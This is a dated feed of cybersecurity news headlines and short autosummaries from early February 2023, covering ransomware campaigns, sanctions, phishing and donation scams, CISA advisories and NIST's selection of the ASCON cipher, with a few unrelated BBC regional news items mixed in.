
                financial
                2023-02-09 https://www.bleepingcomputer.com/news/security/paypal-and-twitter-abused-in-turkey-relief-donation-scams/
                Scammers are now exploiting the ongoing humanitarian crisis in Turkey and Syria: this time stealing donations by abusing legitimate platforms like PayPal and Twitter. [...]

                Autosummary: In these replies, the scammer posts their fraudulent wallet address to dupe donors. In yet another scam, we saw individual Twitter users claiming to raise crypto donations. Searching these wallet addresses online quickly revealed that these had been associated with suspicious accounts and webpages (including adult content threads on the Russian social media website VK). The "Wladimir Charity Foundation" website had earlier been claiming to raise funds for Ukraine war victims. Also circulating lately are scam emails claiming to originate from "UNICEF" partners. "Scammers claim they are a world charity organization in collaboration with UNICEF and call for donations in support of the affected children and families in both countries," Bîzgă points out in the same report. These emails urge recipients to support earthquake victims by making crypto donations to wallet addresses that are, predictably, not associated with any known government or trustworthy entities. "The domain hosting the so-called Wladimir Charity Foundation was created on Oct. 3, 2022, and is already blacklisted by our anti-spam and anti-fraud filters," states Bitdefender's Alina Bîzgă in the report. BleepingComputer further observed the PayPal fundraiser had collected a total of $900 in donations, with the creator of the page "donating" $500 to their own "cause" to make the fundraiser appear authentic. BleepingComputer has reported this fundraiser to PayPal and approached the company for comment.
                Images in the original article: Scammer flooding Twitter replies with illicit crypto addresses (BleepingComputer); Fake crypto donation addresses (Twitter); Dubious "Wladimir Foundation" charity website listing crypto address (BleepingComputer); Fake "Earthquake Relief" emails claim to be associated with UNICEF (Bitdefender); Fake Turkey/Syria fundraiser email claims to originate from a dodgy charity (Bitdefender); Genuine PayPal.com abused in Turkey relief scam (BleepingComputer); Donation amounts raised by the PayPal "fundraiser" (BleepingComputer).


                NIST chooses encryption algorithms for lightweight IoT devices

                industry
                2023-02-09 https://www.helpnetsecurity.com/2023/02/09/encryption-algorithms-iot/

                ASCON is the name of the group of lightweight authenticated encryption and hashing algorithms that the U.S. National Institute of Standards and Technology (NIST) has chosen to secure the data generated by Internet of Things (IoT) devices: implanted medical devices, keyless entry fobs, “smart home” devices, etc. Gathered under the ASCON label are seven algorithms, some of which may not end up being included in the lightweight cryptography standard NIST plans to publish later …

                The post NIST chooses encryption algorithms for lightweight IoT devices appeared first on Help Net Security.


                Autosummary: ASCON, developed in 2014 by a team of cryptographers from Graz University of Technology, Infineon Technologies, Lamarr Security Research and Radboud University, has now been chosen as the winner of the contest, due to its many qualities, which include speed, ease of implementation, energy efficiency, and scalability.


                Gootkit Malware Adopts New Tactics to Attack Healthcare and Finance Firms

                financial exploits industry
                2023-02-09 https://thehackernews.com/2023/02/gootkit-malware-adopts-new-tactics-to.html
                The Gootkit malware is prominently going after healthcare and finance organizations in the U.S., U.K., and Australia, according to new findings from Cybereason. The cybersecurity firm said it investigated a Gootkit incident in December 2022 that adopted a new method of deployment, with the actors abusing the foothold to deliver Cobalt Strike and SystemBC for post-exploitation. "The threat actor



                U.S. and U.K. sanction TrickBot and Conti ransomware operation members

                exploits ransomware
                2023-02-09 https://www.bleepingcomputer.com/news/security/us-and-uk-sanction-trickbot-and-conti-ransomware-operation-members/
                The United States and the United Kingdom have sanctioned seven Russian individuals for their involvement in the TrickBot cybercrime group, whose malware was used to support attacks by the Conti and Ryuk ransomware operations. [...]

                Autosummary: This includes BlackCat, Royal Group, AvosLocker, Karakurt, LockBit, Silent Ransom, and DagonLocker. As the malware became widely detected by security software, the developers launched new malware families, such as BazarBackdoor, Anchor, and BumbleBee, to provide more stealthy infection of targets.


                Bungling Optus scammer was no criminal mastermind

                financial
                2023-02-09 https://grahamcluley.com/bungling-optus-scammer-was-no-criminal-mastermind/
                Perhaps the biggest punishment of all will be Dennis Su's name being forever associated with an extraordinarily inept and cack-handed attempt to frighten people out of money.



                Critical Infrastructure at Risk from New Vulnerabilities Found in Wireless IIoT Devices

                industry
                2023-02-09 https://thehackernews.com/2023/02/critical-infrastructure-at-risk-from.html
                A set of 38 security vulnerabilities has been uncovered in wireless industrial internet of things (IIoT) devices from four different vendors that could pose a significant attack surface for threat actors looking to exploit operational technology (OT) environments. "Threat actors can exploit vulnerabilities in Wireless IIoT devices to gain initial access to internal OT networks," Israeli

                Autosummary: Alternatively, local attackers can break into industrial Wi-Fi access points and cellular gateways by targeting on-site Wi-Fi or cellular channels, leading to adversary-in-the-middle (AitM) scenarios with adverse potential impact.


                Brazil expelling illegal miners from indigenous lands

                latam
                2023-02-09 https://www.bbc.co.uk/news/world-latin-america-64582235?at_medium=RSS&at_campaign=KARANGA
                A major operation is under way to drive out illegal miners from indigenous Yanomami territory.



                Malicious Google ads sneak AWS phishing sites into search results

                financial
                2023-02-09 https://www.bleepingcomputer.com/news/security/malicious-google-ads-sneak-aws-phishing-sites-into-search-results/
                A new phishing campaign targeting Amazon Web Services (AWS) logins is abusing Google ads to sneak phishing sites into Google Search to steal your login credentials. [...]

                Autosummary: The phishing domains seen by Sentinel Labs are aws1-console-login[.]us, aws2-console-login[.]xyz, aws1-ec2-console[.]com, and aws1-us-west[.]info. An interesting feature of the phishing pages is that their author has included a JavaScript function to disable right clicks, middle mouse buttons, and keyboard shortcuts. Images in the original article: AWS phishing page (Sentinel One); Second phishing step, requesting the user password (Sentinel One).


                Hacker develops new "Screenshotter" malware to find high-value targets

                exploits
                2023-02-09 https://www.bleepingcomputer.com/news/security/hacker-develops-new-screenshotter-malware-to-find-high-value-targets/
                A new threat actor tracked as TA886 targets organizations in the United States and Germany with new custom malware to perform surveillance and data theft on infected systems. [...]

                Autosummary: Its capabilities include stealing cryptocurrency wallets, credentials, and cookies stored in web browsers, FTP clients, Steam accounts, Telegram and Discord accounts, VPN configurations, and email clients. Image in the original article: Part of the stealer's code (Proofpoint).


                AA23-040A: #StopRansomware: Ransomware Attacks on Critical Infrastructure Fund DPRK Malicious Cyber Activities

                exploits ransomware
                2023-02-09 https://us-cert.cisa.gov/ncas/alerts/aa23-040a
                Original release date: February 9, 2023

                Summary

                Note: This Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and various ransomware threat actors. These #StopRansomware advisories detail historically and recently observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn about other ransomware threats and no-cost resources.

                The United States National Security Agency (NSA), the U.S. Federal Bureau of Investigation (FBI), the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the U.S. Department of Health and Human Services (HHS), the Republic of Korea (ROK) National Intelligence Service (NIS), and the ROK Defense Security Agency (DSA) (hereafter referred to as the “authoring agencies”) are issuing this joint Cybersecurity Advisory (CSA) to highlight ongoing ransomware activity against Healthcare and Public Health Sector organizations and other critical infrastructure sector entities.

                This CSA provides an overview of Democratic People’s Republic of Korea (DPRK) state-sponsored ransomware and updates the July 6, 2022, joint CSA North Korean State-Sponsored Cyber Actors Use Maui Ransomware to Target the Healthcare and Public Health Sector. This advisory highlights TTPs and IOCs DPRK cyber actors used to gain access to and conduct ransomware attacks against Healthcare and Public Health (HPH) Sector organizations and other critical infrastructure sector entities, as well as DPRK cyber actors’ use of cryptocurrency to demand ransoms.

                The authoring agencies assess that an unspecified amount of revenue from these cryp

                Autosummary: Actors have also been observed using or possessing publicly available tools for encryption, such as BitLocker, Deadbolt, ech0raix, GonnaCry, Hidden Tear, Jigsaw, LockBit 2.0, My Little Ransomware, NxRansomware, Ryuk, and YourRansom [T1486]. The United States National Security Agency (NSA), the U.S. Federal Bureau of Investigation (FBI), the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the U.S. Department of Health and Human Services (HHS), the Republic of Korea (ROK) National Intelligence Service (NIS), and the ROK Defense Security Agency (DSA) (hereafter referred to as the “authoring agencies”) are issuing this joint Cybersecurity Advisory (CSA) to highlight ongoing ransomware activity against Healthcare and Public Health Sector organizations and other critical infrastructure sector entities. This CSA provides an overview of Democratic People’s Republic of Korea (DPRK) state-sponsored ransomware and updates the July 6, 2022, joint CSA North Korean State-Sponsored Cyber Actors Use Maui Ransomware to Target the Healthcare and Public Health Sector. Actors procure infrastructure, IP addresses, and domains with cryptocurrency generated through illicit cybercrime, such as ransomware and cryptocurrency theft.


                US and UK sanctioned seven Russian members of Trickbot gang

                rusia-ucrania
                2023-02-09 https://securityaffairs.com/142041/cyber-crime/us-uk-sanctioned-7-russian-trickbot.html

                The US and the UK authorities have sanctioned seven Russian individuals for their involvement in the TrickBot operations. The US Treasury has frozen the assets belonging to the individuals and imposed travel bans against them. The US Treasury […]

                The post US and UK sanctioned seven Russian members of Trickbot gang appeared first on Security Affairs.


                Autosummary: “These malicious cyber activities have targeted critical infrastructure, including hospitals and medical facilities during a global pandemic, in both the U.S. and the U.K.” This is the first time the UK government has imposed sanctions of this kind; its authorities collaborated with the U.S. Department of the Treasury’s Office of Foreign Assets Control and the U.K.’s Foreign, Commonwealth, and Development Office; National Crime Agency; and His Majesty’s Treasury. “By sanctioning these cyber criminals, we are sending a clear signal to them and others involved in ransomware that they will be held to account,” said UK Foreign Secretary James Cleverly.


                A new variant of ESXiArgs ransomware makes recovery much harder

                exploits ransomware
                2023-02-09 https://securityaffairs.com/142035/malware/esxiargs-ransomware-new-variant.html

                Experts warn of new ESXiArgs ransomware attacks using an upgraded version that makes it harder to recover VMware ESXi virtual machines. Experts spotted a new variant of ESXiArgs ransomware targeting VMware ESXi servers; its authors have improved the encryption process, making it much harder to recover the encrypted virtual machines. The new variant was spotted less than a […]

                The post A new variant of ESXiArgs ransomware makes recovery much harder appeared first on Security Affairs.




                Seven Russians sanctioned over ransomware cyber-crime

                exploits ransomware rusia-ucrania
                2023-02-09 https://www.bbc.co.uk/news/technology-64586361?at_medium=RSS&at_campaign=KARANGA
                UK and US announce rare joint action against the men, including freezing their assets.



                Hackers use fake crypto job offers to push info-stealing malware

                exploits
                2023-02-09 https://www.bleepingcomputer.com/news/security/hackers-use-fake-crypto-job-offers-to-push-info-stealing-malware/
                A campaign operated by Russian threat actors uses fake job offers to target Eastern Europeans working in the cryptocurrency industry, aiming to infect them with a modified version of the Stealerium malware named "Enigma." [...]

                Autosummary: The third stage downloads the final payload, Enigma Stealer, from a private Telegram channel, which Trend Micro says is a modified version of Stealerium, an open-source information-stealing malware. Image in the original article: Defender's token integrity modification (Trend Micro).


                Largest Canadian bookstore Indigo shuts down site after cyberattack

                ciber
                2023-02-09 https://www.bleepingcomputer.com/news/security/largest-canadian-bookstore-indigo-shuts-down-site-after-cyberattack/
                Indigo Books & Music, the largest bookstore chain in Canada, was struck by a cyberattack yesterday, causing the company to make the website unavailable to customers and to only accept cash payments. [...]



                Introducing Malwarebytes Application Block: How to block unauthorized software from executing on Windows endpoints

                exploits
                2023-02-09 https://www.malwarebytes.com/blog/business/2023/02/introducing-malwarebytes-application-block-how-to-block-unauthorized-software-from-executing-on-windows-endpoints

                Categories: Business

                Application Block helps organizations easily thwart unwanted applications from launching on Windows endpoints.


                The post Introducing Malwarebytes Application Block: How to block unauthorized software from executing on Windows endpoints appeared first on Malwarebytes Labs.


                Autosummary: Technical overviews of Application Block are available for Nebula (https://service.malwarebytes.com/hc/en-us/sections/10604417341587-Application-Block) and for OneView (https://service.malwarebytes.com/hc/en-us/sections/13023671722387-Application-Block). Enable Blocking: When setting or modifying a policy in the Nebula console, go to the Software management tab at the bottom. Plugging the holes in your Windows endpoint security: Application Block is just the latest addition to our ever-expanding collection of security modules for Nebula, which include Vulnerability and Patch Management and DNS Filtering.


                Ryuk ransomware laundering leads to guilty plea

                exploits ransomware
                2023-02-09 https://www.malwarebytes.com/blog/news/2023/02/ryuk-ransomware-laundering-leads-to-guilty-plea

                Categories: News

                Tags: ryuk

                Tags: ransomware

                Tags: guilty

                Tags: encrypt

                Tags: ransom

                Tags: cryptocurrency

                Tags: bitcoin

                We take a look at a guilty plea made in relation to Ryuk ransomware proceeds, and how you can best protect yourself from the threat of ransomware.


                The post Ryuk ransomware laundering leads to guilty plea appeared first on Malwarebytes Labs.


                Autosummary: After receiving the ransom payments, the Ryuk actors, defendants, and others involved in the scheme engaged in various financial transactions, including international financial transactions, to conceal the nature, source, location, ownership, and control of the ransom proceeds. From the indictment release: The Ryuk actors used anonymous private wallets in their ransom notes, allowing them to immediately conceal the nature, location, source, ownership, and control of the ransom payments. Malwarebytes Endpoint Detection and Response offers built-in ransomware protection, 72-hour ransomware rollback, and zero-day ransomware protection. Whether we’re talking single, double, or even triple threat ransomware, the problem is very real.


                Chile wildfires threaten animals

                latam
                2023-02-09 https://www.bbc.co.uk/news/world-latin-america-64589513?at_medium=RSS&at_campaign=KARANGA
                An emergency clinic was set up in Santa Juana to treat some of the animals.



                CISA releases recovery script for ESXiArgs ransomware victims

                exploits ransomware
                2023-02-08 https://www.bleepingcomputer.com/news/security/cisa-releases-recovery-script-for-esxiargs-ransomware-victims/
                The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has released a script to recover VMware ESXi servers encrypted by the recent widespread ESXiArgs ransomware attacks. [...]

                Autosummary: While the GitHub project page has the steps you need to recover VMs, in summary, the script will clean up a virtual machine's encrypted files and then attempt to rebuild the virtual machine's .vmdk file using the unencrypted flat file.


                SNP MP Stewart McDonald's emails hacked by Russian group

                rusia-ucrania
                2023-02-08 https://www.bbc.co.uk/news/uk-politics-64562832?at_medium=RSS&at_campaign=KARANGA
                Stewart McDonald tells the BBC his emails have been stolen by a group linked to Russian intelligence.



                CERT-UA Alerts Ukrainian State Authorities of Remcos Software-Fueled Cyber Attacks

                government
                2023-02-08 https://thehackernews.com/2023/02/cert-ua-alerts-ukrainian-state.html
                The Computer Emergency Response Team of Ukraine (CERT-UA) has issued an alert warning of cyber attacks against state authorities in the country that deploy a legitimate remote access software named Remcos. The mass phishing campaign has been attributed to a threat actor it tracks as UAC-0050, with the agency describing the activity as likely motivated by espionage given the toolset employed. The "



                Russian Hackers Using Graphiron Malware to Steal Data from Ukraine

                exploits rusia-ucrania
                2023-02-08 https://thehackernews.com/2023/02/russian-hackers-using-graphiron-malware.html
                A Russia-linked threat actor has been observed deploying a new information-stealing malware in cyber attacks targeting Ukraine. Dubbed Graphiron by Broadcom-owned Symantec, the malware is the handiwork of an espionage group known as Nodaria, which is tracked by the Computer Emergency Response Team of Ukraine (CERT-UA) as UAC-0056. "The malware is written in Go and is designed to harvest a wide "



                Russian Hacker Pleads Guilty to Money Laundering Linked to Ryuk Ransomware

                financial exploits ransomware rusia-ucrania
                2023-02-08 https://thehackernews.com/2023/02/russian-hacker-pleads-guilty-to-money.html
                A Russian national on February 7, 2023, pleaded guilty in the U.S. to money laundering charges and for attempting to conceal the source of funds obtained in connection with Ryuk ransomware attacks. Denis Mihaqlovic Dubnikov, 30, was arrested in Amsterdam in November 2021 before he was extradited from the Netherlands in August 2022. He is awaiting sentencing on April 11, 2023. "Between at least "



                US CISA releases a script to recover servers infected with ESXiArgs ransomware

                exploits ransomware
                2023-02-08 https://securityaffairs.com/141948/malware/uc-cisa-script-esxiargs-ransomware.html

                The U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a script to recover VMware ESXi servers infected with ESXiArgs ransomware. Good news for the victims of the recent wave of ESXiArgs ransomware attacks: the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has released a script to allow them to recover encrypted VMware ESXi servers. The […]

                The post US CISA releases a script to recover servers infected with ESXiArgs ransomware appeared first on Security Affairs.


                Autosummary: Pierluigi Paganini (SecurityAffairs – hacking, ESXiArgs ransomware)


                Russian hackers using new Graphiron information stealer in Ukraine

                rusia-ucrania
                2023-02-08 https://www.bleepingcomputer.com/news/security/russian-hackers-using-new-graphiron-information-stealer-in-ukraine/
                The Russian hacking group known as "Nodaria" (UAC-0056) is using a new information-stealing malware called "Graphiron" to steal data from Ukrainian organizations. [...]

                Autosummary: Capabilities listed: steal SSH known hosts, steal data from PuTTY, steal stored passwords, take screenshots, create a directory, list a directory, run a shell command, steal an arbitrary file. The malware uses the following PowerShell code to steal passwords from the Windows Vault, the system's built-in password manager, where saved credentials are stored in AES-256 encrypted form.


                CISA releases ESXiArgs ransomware recovery script

                exploits ransomware
                2023-02-08 https://www.helpnetsecurity.com/2023/02/08/esxiargs-ransomware-recovery/

                According to the latest data, the number of ESXiArgs ransomware victims has surpassed 3,800, and CISA has published a recovery script for victim organizations. Fixing the mess The attacks started late last week and are still ongoing. Investigations point to a new family of ransomware dubbed ESXiArgs by the researchers – though, according to Paul Ducklin, Sophos Head of Technology for the Asia Pacific region, it should be just Args, as it’s a Linux program … More

                The post CISA releases ESXiArgs ransomware recovery script appeared first on Help Net Security.


                Autosummary: The malware attempts to kill off running virtual machines, export an ESXi filesystem volume list, find important VMware files for each volume, and call a general-purpose file scrambling tool for each file found, Ducklin explained.


                Sydney Man Sentenced for Blackmailing Optus Customers After Data Breach

                financial
                2023-02-08 https://thehackernews.com/2023/02/sydney-man-sentenced-for-blackmailing.html
                A Sydney man has been sentenced to an 18-month Community Correction Order (CCO) and 100 hours of community service for attempting to take advantage of the Optus data breach last year to blackmail its customers. The unnamed individual, 19 when arrested in October 2022 and now 20, used the leaked records stolen from the security lapse to orchestrate an SMS-based extortion scheme. The suspect "



                Ukraine CERT-UA warns of phishing attacks employing Remcos software

                financial
                2023-02-08 https://securityaffairs.com/141959/cyber-warfare-2/cert-ua-remcos-attacks.html

                The Computer Emergency Response Team of Ukraine (CERT-UA) warns of a new wave of attacks against state authorities to deploy the Remcos software. The Computer Emergency Response Team of Ukraine (CERT-UA) is warning of a phishing campaign aimed at state authorities that involves the use of the legitimate remote access software Remcos. The phishing emails, […]

                The post Ukraine CERT-UA warns of phishing attacks employing Remcos software appeared first on Security Affairs.


                Autosummary: Pierluigi Paganini (SecurityAffairs – hacking, Remcos)


                Chile forest fires: Heatwave puts new regions at risk

                latam
                2023-02-08 https://www.bbc.co.uk/news/world-latin-america-64568379?at_medium=RSS&at_campaign=KARANGA
                Thousands of firefighters are battling blazes in the south of Chile which have killed dozens of people.



                Malicious Dota 2 game modes infected players with malware

                exploits
                2023-02-08 https://www.bleepingcomputer.com/news/security/malicious-dota-2-game-modes-infected-players-with-malware/
                Security researchers have discovered four malicious Dota 2 game modes that were used by a threat actor to backdoor the players' systems. [...]

                Autosummary: "This backdoor permits the execution of any JavaScript acquired through HTTP, providing the attacker the power to both conceal and modify the exploit code at their discretion without undergoing the game mode verification process, which can be dangerous, and updating the entire custom game mode," Vojtěšek said.


                Android 14 to block malware from abusing sensitive permissions

                exploits
                2023-02-08 https://www.bleepingcomputer.com/news/security/android-14-to-block-malware-from-abusing-sensitive-permissions/
                Google has announced the release of the first developer preview for Android 14, the next major version of the world's most popular mobile operating system, which comes with security and privacy enhancements, among other things. [...]

                Autosummary: Android 14 enhances security. Starting with "runtime receivers," which enable apps to receive intents broadcast by the system or other applications, all apps targeting Android 14 must declare whether they need to receive information from other apps or whether they should be limited to system broadcasts.


                Money Lover for Android & iOS leaked email addresses, transactions

                financial
                2023-02-08 https://www.bleepingcomputer.com/news/security/money-lover-for-android-and-ios-leaked-email-addresses-transactions/
                A flaw in the Money Lover financial app for Android, iOS, and Windows allowed any logged-in member to see the email addresses and live transaction metadata for other users' shared wallets. [...]

                Autosummary: Money Lover app on the Play Store (BleepingComputer). Money Lover allows users to create "shared wallets" with specific users, like family members or coworkers, to log transactions and collaborate in expense logging and monitoring.


                Lessons Learned on Ransomware Prevention from the Rackspace Attack

                exploits ransomware
                2023-02-08 https://www.bleepingcomputer.com/news/security/lessons-learned-on-ransomware-prevention-from-the-rackspace-attack/
                The ransomware attack on Rackspace has taught us the importance of good cybersecurity habits. Let's see what we can learn from the attack and how organizations can protect themselves. [...]

                Autosummary: Specops Password Policy: block words common to your organization with custom dictionaries; prevent the use of 3+ billion compromised passwords with Breached Password Protection; find and remove compromised passwords in your environment; real-time, dynamic feedback at password change; block usernames, display names, specific words, consecutive characters, incremental passwords, and reuse of a part of the current password; granular, GPO-driven targeting for any GPO level, computer, user, or group population. Protecting against ransomware: ransomware is a growing concern for organizations worldwide, as the fallout and consequences of suffering a ransomware attack are usually severe. Let's look at the following strategies for preventing the domino effect of a ransomware attack: patching, securing remote access systems, and strengthening password security. Patching is a vital aspect of preventing a ransomware attack. As a result, protecting against ransomware attacks and the fallout requires organizations to have a multi-pronged approach to strengthen their security, including patching, securing remote access, and increasing password security.


                AA23-039A: ESXiArgs Ransomware Virtual Machine Recovery Guidance

                exploits ransomware
                2023-02-08 https://us-cert.cisa.gov/ncas/alerts/aa23-039a
                Original release date: February 8, 2023

                Summary

                The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) are releasing this joint Cybersecurity Advisory (CSA) in response to the ongoing ransomware campaign, known as “ESXiArgs.” Malicious actors may be exploiting known vulnerabilities in VMware ESXi servers that are likely running unpatched and out-of-service or out-of-date versions of VMware ESXi software to gain access and deploy ransomware. The ESXiArgs ransomware encrypts configuration files on ESXi servers, potentially rendering virtual machines (VMs) unusable. 

                CISA has released an ESXiArgs recovery script at github.com/cisagov/ESXiArgs-Recover. Organizations that have fallen victim to ESXiArgs ransomware can use this script to attempt to recover their files. This CSA provides guidance on how to use the script.
                ESXiArgs actors have compromised over 3,800 servers globally. CISA and FBI encourage all organizations managing VMware ESXi servers to: 

                • Update servers to the latest version of VMware ESXi software
                • Harden ESXi hypervisors by disabling the Service Location Protocol (SLP) service, and 
                • Ensure the ESXi hypervisor is not exposed to the public internet. 

                If malicious actors have compromised your organization with ESXiArgs ransomware, CISA and FBI recommend following the script and guidance provided in this CSA to attempt to recover access to your files.  

                Download the PDF version of this report: pdf, 712 kb.

                Note: CISA and FBI will update this CSA as more information becomes available.
                 

                Technical Details

                Open-source reporting indicates that malicious actors are exploiting known vulnerabilities in VM "

                Autosummary: The full list of file extensions encrypted by the malware is: vmdk, vmx, vmxf, vmsd, vmsn, vswp, vmss, nvram, vmem. See the joint CSA from the cybersecurity authorities of Australia, Canada, New Zealand, the United Kingdom, and the United States on Technical Approaches to Uncovering and Remediating Malicious Activity for additional guidance on hunting or investigating a network, and for common mistakes in incident handling. Organizations should also collect and review artifacts, such as running processes/services, unusual authentications, and recent network connections. CISA and FBI encourage all organizations managing VMware ESXi servers to: The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) are releasing this joint Cybersecurity Advisory (CSA) in response to the ongoing ransomware campaign, known as “ESXiArgs.” Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities.


                NIST Standardizes Ascon Cryptographic Algorithm for IoT and Other Lightweight Devices

                industry
                2023-02-08 https://thehackernews.com/2023/02/nist-standardizes-ascon-cryptographic.html
                The U.S. National Institute of Standards and Technology (NIST) has announced that a family of authenticated encryption and hashing algorithms known as Ascon will be standardized for lightweight cryptography applications. "The chosen algorithms are designed to protect information created and transmitted by the Internet of Things (IoT), including its myriad tiny sensors and actuators," NIST said.



                Russian national pleads guilty to money laundering linked to Ryuk Ransomware operation

                financial exploits ransomware rusia-ucrania
                2023-02-08 https://securityaffairs.com/141980/cyber-crime/russian-national-pleads-guilty-money-laundering-ryuk-ransomware.html

                A Russian national pleaded guilty in the U.S. to money laundering charges linked to the Ryuk ransomware operation. On February 7, 2023, Russian national Denis Mihaqlovic Dubnikov (30) pleaded guilty in the U.S. to one count of conspiracy to commit money laundering for the Ryuk ransomware operation. Denis Mihaqlovic Dubnikov, 30, was arrested in Amsterdam in November […]

                The post Russian national pleads guilty to money laundering linked to Ryuk Ransomware operation appeared first on Security Affairs.


                Autosummary: Pierluigi Paganini (SecurityAffairs – hacking, Ryuk ransomware)


                Weee! grocery service confirms data breach, 1.1 million affected

                financial
                2023-02-08 https://www.bleepingcomputer.com/news/security/weee-grocery-service-confirms-data-breach-11-million-affected/
                The Weee! Asian and Hispanic food delivery service suffered a data breach exposing the personal information of 1.1 million customers. [...]

                Autosummary: Forum post leaking the data for Weee! (Source: BleepingComputer). The leaked database contains Weee! customers' first and last names, email addresses, phone numbers, device type (iOS/PC/Android), order notes, and other data the delivery platform uses.


                US NIST unveils winning encryption algorithm for IoT data protection

                industry
                2023-02-08 https://www.bleepingcomputer.com/news/security/us-nist-unveils-winning-encryption-algorithm-for-iot-data-protection/
                The National Institute of Standards and Technology (NIST) announced that ASCON is the winning bid for the "lightweight cryptography" program to find the best algorithm to protect small IoT (Internet of Things) devices with limited hardware resources. [...]

                Autosummary: NIST also considered that the algorithm had withstood the test of time, having been developed in 2014 by a team of cryptographers from Graz University of Technology, Infineon Technologies, Lamarr Security Research, and Radboud University, and winning the CAESAR cryptographic competition's "lightweight encryption" category in 2019.


                Malicious Dota 2 game mods infected players with malware

                exploits
                2023-02-08 https://www.bleepingcomputer.com/news/security/malicious-dota-2-game-mods-infected-players-with-malware/
                Security researchers have discovered four malicious Dota 2 game mods that were used by a threat actor to backdoor the players' systems. [...]

                Autosummary: "This backdoor permits the execution of any JavaScript acquired through HTTP, providing the attacker the power to both conceal and modify the exploit code at their discretion without undergoing the game mode verification process, which can be dangerous, and updating the entire custom game mode," Vojtěšek said.


                Russian e-commerce giant Elevel exposed buyers’ delivery addresses

                rusia-ucrania
                2023-02-08 https://securityaffairs.com/142000/data-breach/elevel-data-leak.html

                A leading electrical engineering company in Russia, Elevel, has exposed its customers’ personally identifiable information (PII), including full names and addresses. Original post at hxxps://cybernews.com/privacy/russian-e-commerce-giant-data-leak/ Founded in 1991, Elevel (previously Eleko) positions itself as the leading Russian electrical engineering company that runs both an e-commerce business and wholesale stores. On January 24, the Cybernews research […]

                The post Russian e-commerce giant Elevel exposed buyers’ delivery addresses appeared first on Security Affairs.




                Ransomware review: February 2023

                exploits
                2023-02-08 https://www.malwarebytes.com/blog/business/2023/02/ransomware-in-february-2023

                Categories: Ransomware

                Categories: Threat Intelligence

                Our Threat Intelligence team looks at known ransomware attacks by gang, country, and industry sector in January 2023, and looks at LockBit's newest encryptor.


                The post Ransomware review: February 2023 appeared first on Malwarebytes Labs.


                Autosummary: According to the DoJ, the Hive ransomware group has targeted over 1,500 victims in over 80 countries, including hospitals, school districts, financial firms, and critical infrastructure, attempting to extort hundreds of millions of dollars from victims in the United States and around the world. Charts: known ransomware attacks by gang in January 2023; known ransomware attacks by country in January 2023; known ransomware attacks by industry sector in January 2023. While LockBit was plowing through the new year, however, there was nothing but radio silence from another notorious ransomware player. A post on the Dark Web by LockBit (translated from the original Russian) suggests the group is supplementing the ransomware ("lockers") it already sells, rather than replacing it: "I have repeatedly said that I want to collect as many top lockers as possible in one panel, who have well-known and good sources lying around, write - I will buy."


                Update now! GoAnywhere MFT zero-day patched

                exploits
                2023-02-08 https://www.malwarebytes.com/blog/news/2023/02/update-now-goanywhere-mft-zero-day-patched

                Categories: News

                Tags: GoAnywhere MFT

                Tags: managed file transfer

                Tags: Kevin Beaumont

                Tags: Brian Krebs

                Tags: emergency patch 7.1.2

                Tags: Fortra

                Tags: Cobalt Strike

                Tags: Florian Hauser

                Tags: Code White

                A bug in GoAnywhere, a B2B management file transfer software, could lead to a serious supply chain attack if left unpatched. Update now!


                The post Update now! GoAnywhere MFT zero-day patched appeared first on Malwarebytes Labs.


                Autosummary: Brian Krebs of KrebsOnSecurity graciously shared what Fortra said in its advisory, which can only be accessed by creating a free account: "The attack vector of this exploit requires access to the administrative console of the application, which in most cases is accessible only from within a private company network, through VPN, or by allow-listed IP addresses (when running in cloud environments, such as Azure or AWS)."


                ION starts bringing customers back online after LockBit ransomware attack

                exploits ransomware
                2023-02-08 https://www.malwarebytes.com/blog/news/2023/02/ion-starts-bringing-customers-back-online-after-lockbit-ransomware-attack

                Categories: News

                Categories: Ransomware

                Tags: LockBit

                Tags: ransomware

                Tags: LockBit ransomware group

                Tags: FBI

                Tags: Todd Conklin

                Tags: Financial Conduct Authority

                Tags: FCA


                Tags: Prudential Regulation Authority

                Tags: PRA

                Tags: Tom Kellermann

                Tags: Joseph Schifano

                Pernicious ransomware group, LockBit, is making headlines again. Less than a month after attacking HACLA, it hit the derivatives trading division of ION Group, a financial software company.


                The post ION starts bringing customers back online after LockBit ransomware attack appeared first on Malwarebytes Labs.


                Autosummary: The ION Group leak site post (Source: Malwarebytes). On Friday, February 4, the ransomware group claimed the ransom had been paid, with Reuters quoting the attackers as saying the money was paid by a "very rich unknown philanthropist". Malwarebytes Endpoint Detection and Response offers built-in ransomware protection, 72-hour ransomware rollback, and zero-day ransomware protection. The subsidiary, ION Cleared Derivatives, which offers software for automating the trading cycle and the clearing process for derivatives, released a very short statement regarding the "cybersecurity event" on Tuesday.


                Industrial Defender and Nozomi Networks partner to protect critical operational technology

                industry
                2023-02-07 https://www.helpnetsecurity.com/2023/02/07/industrial-defender-nozomi-networks/

                Nozomi Networks and Industrial Defender have unveiled a strategic partnership to enhance the security of critical infrastructure and manufacturing facilities. The companies’ joint solution combines asset visibility and threat detection capabilities from Nozomi Networks with change and configuration monitoring from Industrial Defender to provide the most complete and detailed view of OT assets and behavior in the industry. “Collaborating with industry leaders is essential for effectively defending against the growing cyber threats against operational technology. … More

                The post Industrial Defender and Nozomi Networks partner to protect critical operational technology appeared first on Help Net Security.




                India-China relations will define the IoT landscape in 2023

                industry
                2023-02-07 https://www.helpnetsecurity.com/2023/02/07/iot-landscape-2023/

                Tensions between two of the biggest producers of connected (IoT) devices are coming to a head, and will be changing the IoT landscape in 2023. In recent months, India and China have faced off over their disputed border in the Himalayas. The military stand-off mirrors growing tech conflict between the two superpowers. In a relationship increasingly marked by diplomatic disputes and trade rivalry, India and China are now competing for the Internet of Things (IoT). … More

                The post India-China relations will define the IoT landscape in 2023 appeared first on Help Net Security.


